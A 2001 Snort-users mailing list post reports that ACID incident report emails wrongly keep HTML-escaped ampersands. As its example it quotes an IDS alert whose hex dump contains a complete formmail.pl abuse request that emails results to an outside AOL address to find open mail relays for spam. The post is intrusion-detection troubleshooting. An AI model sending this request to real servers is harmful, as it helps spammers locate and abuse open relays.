ACID Incident Report escapes emails

["Michael Scheidell" <scheidell () fdma com>]

on the acid display screen, it has to 'escape' the ampersand so that it
can be displayed correctly on the html browser

However, when it emails a 'full report' it still escapes the ampersand,
making the ascii data a little difficult to read.

example:

the data is this&that

html script HAS to do: this&that so that this&that is displayed on
screen, however, when thhe email is send via acid, it should not escape
the ampersand:


(and, yes, this was some luser at aldelpha searching for open web form mail
scripts, using it to send it back to itself at aol  to collect holes to spam
from)

Michael Scheidell

> --
> #(5 - 42754) [2001-10-22 04:35:57] [Bugtraq/1187] [CVE/CVE-1999-0172]
> [arachNIDS/226]  WEB-CGI formmail access
> IPv4: 24.51.65.183 -> xx.xx.xx.xxxx
>       hlen=5 TOS=0 dlen=478 ID=50070 flags=0 offset=0 TTL=113 chksum=57049
> TCP:  port=21039 -> dport: 80  flags=***AP*** seq=4199629098
>       ack=3611075816 off=5 res=0 win=17520 urp=0 chksum=53227
> Payload:  length = 438
>
> 000 : 47 45 54 20 2F 63 67 69 2D 62 69 6E 2F 66 6F 72   GET /cgi-bin/for
> 010 : 6D 6D 61 69 6C 2E 70 6C 3F 65 6D 61 69 6C 3D 63   mmail.pl?email=c
> 020 : 78 74 31 34 40 6D 6B 65 34 31 2E 63 6F 6D 26 72
xt14 () mke41 com&r
> 030 : 65 63 69 70 69 65 6E 74 3D 70 77 73 38 38 38 40   ecipient=pws888@
> 040 : 61 6F 6C 2E 63 6F 6D 26 73 75 62 6A 65 63 74 3D
aol.com&subject=
> 050 : 68 74 74 70 3A 2F 2F 63 75 72 61 67 65 6E 2E 63   http://xxxxxxx.c
> 060 : 6F 6D 2F 63 67 69 2D 62 69 6E 2F 66 6F 72 6D 6D   om/cgi-bin/formm
> 070 : 61 69 6C 2E 70 6C 25 32 30 25 32 30 25 32 30 25   ail.pl%20%20%20%
> 080 : 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 32   20%20%20%20%20%2
> 090 : 30 25 32 30 35 39 6C 6F 35 39 26 3D 25 30 44 25
0%2059lo59&=%0D%
> 0a0 : 30 41 25 30 44 25 30 41 74 69 6D 65 2F 64 61 74   0A%0D%0Atime/dat
> 0b0 : 65 3A 25 32 30 30 34 3A 33 39 3A 33 36 61 6D 25   e:%2004:39:36am%
> 0c0 : 32 30 2F 25 32 30 31 30 2F 32 32 2F 32 30 30 31   20/%2010/22/2001
> 0d0 : 25 30 44 25 30 41 3C 41 25 32 30 48 52 45 46 25
%0D%0A<A%20HREF%
> 0e0 : 33 44 25 32 32 68 74 74 70 3A 2F 2F 63 75 72 61   3D%22http://xxxx
> 0f0 : 67 65 6E 2E 63 6F 6D 2F 63 67 69 2D 62 69 6E 2F   xxx.com/cgi-bin/
> 100 : 66 6F 72 6D 6D 61 69 6C 2E 70 6C 25 32 32 3E 68
formmail.pl%22>h
> 110 : 74 74 70 3A 2F 2F 63 75 72 61 67 65 6E 2E 63 6F   ttp://xxxxxxx.co
> 120 : 6D 2F 63 67 69 2D 62 69 6E 2F 66 6F 72 6D 6D 61   m/cgi-bin/formma
> 130 : 69 6C 2E 70 6C 3C 2F 41 3E 25 30 44 25 30 41 25
il.pl</A>%0D%0A%
> 140 : 30 44 25 30 41 35 39 6C 6F 35 39 25 32 30 7E 76   0D%0A59lo59%20~v
> 150 : 6D 73 20 48 54 54 50 2F 31 2E 30 0D 0A 43 61 63   ms HTTP/1.0..Cac
> 160 : 68 65 2D 43 6F 6E 74 72 6F 6C 3A 20 4E 6F 2D 43   he-Control: No-C
> 170 : 61 63 68 65 0D 0A 50 72 6F 78 79 2D 43 6F 6E 6E   ache..Proxy-Conn
> 180 : 65 63 74 69 6F 6E 3A 20 4B 65 65 70 2D 41 6C 69   ection: Keep-Ali
> 190 : 76 65 0D 0A 41 63 63 65 70 74 3A 20 2A 2F 2A 0D   ve..Accept: */*.
> 1a0 : 0A 48 4F 53 54 3A 20 63 75 72 61 67 65 6E 2E 63   .HOST: xxxxxxx.c
> 1b0 : 6F 6D 0D 0A 0D 0A                                 om....
>
> LEGAL NOTICE - Unless expressly stated otherwise, this message is
> confidential and may be privileged. It is intended for the addressee(s)
> only. Access to this e-mail by anyone else is unauthorized. If you are not
> an addressee, any disclosure or copying of the contents or any action
taken
> (or not taken) in reliance on it is unauthorized and may be unlawful. If
you
> are not an addressee, please inform the sender immediately.


_______________________________________________
Snort-users mailing list
Snort-users () lists sourceforge net
Go to this URL to change user options or unsubscribe:
https://lists.sourceforge.net/lists/listinfo/snort-users
Snort-users list archive:
http://www.geocrawler.com/redir-sf.php3?list=snort-users